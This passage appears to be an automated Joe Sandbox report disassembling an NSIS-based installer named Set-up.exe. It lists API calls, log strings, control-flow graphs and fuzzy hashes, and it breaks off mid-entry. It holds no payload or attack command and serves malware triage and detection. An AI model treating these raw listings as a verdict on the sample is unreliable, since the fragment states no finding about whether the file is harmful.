                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                    • API String ID: 608394941-2746725676
                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                    • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004246CD,74DF23A0,00000000), ref: 00404FD6
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FE6
                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FF9
                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                    • API String ID: 4286501637-2478300759
                                                                    • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                    • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                    Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                    Strings
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                    • Null, xrefs: 004036AA
                                                                    • soft, xrefs: 004036A1
                                                                    • Inst, xrefs: 00403698
                                                                    • Error launching installer, xrefs: 00403603
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-527102705
                                                                    • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                    • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                    Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                    • WriteFile.KERNELBASE(00000000,00000000,004246CD,00403792,00000000), ref: 004034FF
                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                    • String ID: (]C$... %d%%$pAB
                                                                    • API String ID: 651206458-3635341587
                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                    Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00445D80,004246CD,74DF23A0,00000000), ref: 00404FD6
                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FE6
                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FF9
                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004246CD,74DF23A0,00000000), ref: 00406902
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2740478559-0
                                                                    • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                    • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                    APIs
                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                    • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                    • API String ID: 247603264-1827671502
                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                    APIs
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004246CD,74DF23A0,00000000), ref: 00404FD6
                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FE6
                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004246CD,74DF23A0,00000000), ref: 00404FF9
                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    Strings
                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                    • API String ID: 3156913733-2180253247
                                                                    • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                    • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                    • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                    • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                    Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                    • String ID: HideWindow
                                                                    • API String ID: 1249568736-780306582
                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
